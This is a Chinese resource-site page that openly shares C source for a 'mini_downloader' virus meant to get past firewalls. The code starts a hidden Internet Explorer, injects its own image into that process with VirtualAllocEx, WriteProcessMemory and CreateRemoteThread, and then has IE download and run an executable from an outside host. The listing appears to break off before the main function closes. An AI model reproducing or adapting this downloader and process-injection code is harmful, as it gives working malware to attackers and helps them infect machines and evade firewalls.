电脑资料
当前位置:资料库>电脑资料>
我要投稿 投诉建议

免费分享一穿越防火墙病毒代码 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    /*

    "mini_downloader"

    code bykardinal p.s.t

    compile by vc++ 6.0

    can not run under win98;

    */

    #include

    #pragma comment(lib,"user32.lib")

    #pragma comment(lib,"kernel32.lib")

    //#pragma comment(linker, "/OPT:NOWIN98")  //取消这几行的注释,编译出的文件只有2K大小

    //#pragma comment(linker, "/merge:.data=.text")

    //#pragma comment(linker, "/merge:.rdata=.text")

    //#pragma comment(linker, "/align:0x200")

    #pragma comment(linker, "/ENTRY:main")

    #pragma comment(linker, "/subsystem:windows")

    #pragma comment(linker, "/BASE:0x13150000")

    HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数

    DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数

    HANDLE processhandle;

    DWORD pid;

    HINSTANCE hshell,hurlmon;

    void download() //注入使用的下载函数

    {

    hshell=LoadLibrary("Shell32.dll");

    hurlmon=LoadLibrary("urlmon.dll");

    (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");

    (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");

    DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c:\\ieinst12.exe",0, NULL);

    SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5);

    ExitProcess(0);

    };

    void main() //主函数

    {

    //1.得到IE路径,并运行

    char iename[MAX_PATH],iepath[MAX_PATH];

    ZeroMemory(iename,sizeof(iename));

    ZeroMemory(iepath,sizeof(iepath));

    GetWindowsDirectory(iepath,MAX_PATH);

    strncpy(iename,iepath,3);

    strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");

    //strcat(iename,"windows\\notepad.EXE");

    WinExec(iename,SW_HIDE);

    Sleep(500);

    //2.得到 IE process handle

    HWND htemp;

    htemp=FindWindow("IEFrame",NULL);

    GetWindowThreadProcessId(htemp,&pid);

    processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

    //3.分配内存

    HMODULE Module;

    LPVOID NewModule;

    DWORD Size;

    LPDWORD lpimagesize;

    Module = GetModuleHandle(NULL);//进程映像的基址

    //得到内存镜像大小

    _asm

    {

    push eax;

    push ebx;

    mov ebx,Module;

    mov eax,[ebx+0x3c];

    lea eax,[ebx+eax+0x50];

    mov eax,[eax]

    mov lpimagesize,eax;

    pop ebx;

    pop eax;

    };

    Size=(DWORD)lpimagesize;

    NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置

    //4.写内存,创建线程

    WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据

    LPTHREAD_START_ROUTINE entrypoint;

    __asm

    {

    push eax;

    lea eax,download;

    mov entrypoint,eax;

    pop eax

    }

    CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);   //建立远程线程,并运行 

相关文章
最新文章
推荐文章

Copyright©2006-2024 优文网 unjs.com 版权所有 手机版